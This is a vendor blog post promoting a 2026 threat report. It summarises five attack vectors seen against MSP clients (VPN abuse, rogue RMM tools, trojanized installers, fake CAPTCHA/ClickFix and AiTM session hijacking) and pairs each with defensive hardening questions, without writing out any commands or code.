Are Your MSP Clients Protected Against These 5 Attack Vectors? | 2026 Annual Threat Report

Picture this: one of your clients gets an email that looks like an invoice. They open it, run the attachment, and go back to their day. Somewhere else, a colleague logs into the VPN, same as every morning, and a vendor portal asks them to verify their identity with a quick CAPTCHA. They paste in the command and move on. 

Both moments feel routine. Forgettable, even. But either could be the start of a cybersecurity incident. Last year, interactions like these made up the majority of cases Blackpoint’s SOC observed and contained. 

In this article, we unpack five areas where MSP client environments are most at risk, drawn directly from incident data in Blackpoint’s 2026 Annual Threat Report. For each one: what the data shows, how attackers are using it, and the questions worth running through your client environments right now. 

Is Your Client Environment Exposed? 

These aren’t theoretical vulnerabilities. Each one maps directly to what Blackpoint’s SOC observed and stopped across client environments last year. 

1. SSL VPN Access: When Getting in Means Going Everywhere 

SSL VPN abuse accounted for 33% of identifiable incidents Blackpoint SOC tracked, making it one of the most abused initial access vectors threat actors relied on last year. SonicWall devices showed up in 59% of those cases.  

Compromised VPN credentials are only part of the problem. In most environments, a VPN session lands with broad internal routing, with direct access to domain controllers, backup infrastructure, and RMM consoles. There’s no internal friction; getting in and moving fast are basically the same step. 

Detection and hardening questions: 

• Does the VPN address pool have direct access to domain controllers or hypervisors? 

• Are VPN authentication logs monitored for impossible travel, geo anomalies, or off-hours sessions? 

• When did you last rotate VPN credentials and remove stale accounts? 

Why this matters beyond the technical: A VPN is supposed to be a secure tunnel into your client’s network. The problem is that in many environments, once someone’s in, they can reach everything: servers, backups, admin tools. One stolen password opens the whole building. Making sure VPN access is scoped to only what it actually needs to reach closes a lot of that risk. 

2. Rogue RMM Tools: Including the Ones You Didn’t Install 

RMM tool abuse made up 30.3% of identifiable incidents the Blackpoint SOC handled in 2025. ScreenConnect appeared in 71.5% of those rogue RMM cases, making it the most frequently abused remote management tool Blackpoint tracked. 

What makes rogue RMM installations hard to catch: most MSP client environments already run multiple RMM agents. That’s normal and expected. And that’s exactly what attackers use as cover. The 2026 ATR details the specific RMM abuse campaigns Blackpoint tracked, but the underlying problem is a visibility one. Do you actually know which RMM installs in your clients’ environments belong there? 

Detection and hardening questions: 

• Do you have an authoritative inventory of which RMM tools are approved for which devices? 

• Are you monitoring for newly installed RMM agents outside that baseline? 

• Is application control in place to block unapproved RMM executables? 

Why this matters beyond the technical: RMM tools are how you manage your clients remotely. Attackers know MSP environments have several of them installed already, so they add one more and it blends right in. One unauthorized install gives them persistent remote access that can survive a partial cleanup if the second install gets missed. 

3. Trojanized Installers: Because Users Don’t Know the Difference 

Trojanized installers are one of the more underestimated threats because they exploit something security awareness training can’t fully fix: a user who needs a tool, finds a convincing download page, and installs what they think they need. 

Last year, Blackpoint SOC tracked campaigns impersonating software your clients use every day. The installers ran in a trusted context, performed enough normal behavior to avoid immediate suspicion, and established a foothold before anything looked wrong. The specific applications being spoofed and what got deployed afterward are covered in the report. 

Detection and hardening questions: 

• Do your clients have restrictions on execution from Downloads, Temp, or AppData directories? 

• Are you alerting on installer behavior that spawns PowerShell, cmd, or msiexec? 

• Is there an approved software catalog, or are users finding their own downloads? 

Why this matters beyond the technical: When there’s no approved software list, users Google what they need, find a convincing download page, and click install. Attackers build those pages on purpose. The installer looks real, installs something real, and quietly drops malware at the same time. You can’t train your way out of this one. You have to lock down where software can come from. 

The attacker didn’t need to break anything. They needed a user to click Install. 

4. Fake CAPTCHA and ClickFix Attacks: Exploiting the Habit of Clicking “Verify” 

Fake CAPTCHA and ClickFix attacks were the single largest threat category Blackpoint’s SOC tracked in 2025, accounting for 58% of identifiable incidents. 

If you’ve read how these attacks work, you know the execution path runs through tools Windows already trusts. What’s less discussed is how fake CAPTCHA campaign infrastructure evolved last year in ways that make traditional takedown approaches ineffective. The 2026 ATR covers that in full. The more immediate question is whether the execution paths these attacks depend on are actually locked down in your clients’ environments. 

Detection and hardening questions: 

• Is the Windows Run dialog (Win+R) restricted via GPO for standard users? 

• Are you blocking outbound connections to Web3 RPC endpoints? 

• Do you have behavioral alerting on clipboard-based execution chains? 

Why this matters beyond the technical: Users are used to clicking “I’m not a robot.” Attackers built on that habit. They create fake verification pages that, instead of proving you’re human, ask you to paste a command into Windows and run it. The command looks like nothing. It isn’t. More than half of the incidents Blackpoint’s SOC handled last year started this way. Security awareness training helps. Blocking the execution path helps more. 

5. MFA Gaps: What Happens After Authentication Succeeds 

MFA is essential. Worth saying directly. The issue is that attackers largely stopped trying to defeat it and started targeting what comes out the other end: the authenticated session. 

AiTM (Adversary-in-the-Middle) phishing was one of the most effective cloud-focused attack techniques Blackpoint’s SOC observed throughout 2025 — and it’s the vector most MSPs haven’t fully accounted for in their client security posture. The attack proxies the authentication flow in real time, capturing the session cookie after a login that succeeds normally. No MFA bypass, no brute force. Just session hijacking after a clean sign-in. 

Detection and hardening questions: 

• Have you moved client accounts to phishing-resistant MFA (FIDO2/WebAuthn) where possible? 

• Are you monitoring for OAuth consent grants, new inbox rules, and suspicious application authorizations? 

• Is conditional access evaluating device compliance and session risk, or just confirming MFA completed? 

Why this matters beyond the technical: MFA still works. Keep using it. But attackers have moved past trying to steal passwords or crack MFA codes. Instead, they let the login succeed normally and then steal the session that gets created afterward. It’s like someone copying your hotel keycard right after you check in. The front desk never knew. Monitoring what happens after a successful login matters just as much as protecting the login itself. 

Protect Your MSP Clients From These Threats in 2026 

If any of these areas look familiar in your client environments, the 2026 Annual Threat Report goes deeper on all of them — full attack chain walkthroughs, detection patterns, the complete vulnerability landscape from 2025, and defense frameworks built from what Blackpoint’s SOC observed in the field. Download the 2026 Annual Threat Report now.